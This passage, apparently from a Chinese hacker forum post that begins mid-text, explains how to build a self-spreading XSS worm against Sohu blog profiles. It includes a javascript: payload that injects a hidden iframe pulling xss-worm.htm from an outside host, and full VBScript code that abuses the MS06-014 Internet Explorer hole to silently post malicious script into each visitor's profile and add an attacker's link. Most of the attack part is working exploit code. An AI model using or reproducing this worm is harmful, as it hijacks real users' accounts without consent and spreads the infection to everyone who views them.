分析:写成JAVACRIPT后需转HTML编码十进制,一小段便超过2000字符了。
2.“域权限”限制。
分析:XSS worm的POST数据相关代码不能从站外调用,通俗点讲就是不能站外提交数据,包括调用外部JS用document.write方法,所以只能把POST数据的代码全部写到XSS里。
从正常的脚本代码上估计是没什么方法了,只有靠浏览器的漏洞,突破以上两点的思路:
1.直接用XSS代码写一个框架网页.
Quote:
javascript:for(i=0;i<document.images.length;i++){if(document.images.src.indexOf('j')==0)document.images.width=0};document.body.insertAdjacentHTML("afterBegin"," <iframe src=http://xxxxxx.com/ xss-worm.htm width=0 height=0></iframe")
2.利用MS06-014漏洞创建本地权限POST数据. xss-worm.htm 代码如下:
Quote:
<html>
<script language="VBScript">
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
x.Open "post"," http://blog.sohu.com/manage/profile.do",False
x.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
x.send " 恶意XSS数据"
x.Open "post"," http://blog.sohu.com//manage/link.do",False
x.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
x.send "m=add&title=Hacker%20s0n9&desc=XSS%20worm&link=http%3A//s0n9.blog.sohu.com"
</script>
</html>
分析:xss-worm.htm也就是框架网页,提交 恶意XSS数据到浏览者的资料里,至于 恶意XSS数据也就是第一步写框架网页修改个人资料所抓的包的内容,同时浏览者也会自动加一个友情连接。
总结:当浏览者进去XSS worm页面,就会自动修改自己的个人档案加入恶意XSS内容,同时其他浏览者也会传染,唯一的限制就是浏览器必须没有打MS06-014的补丁。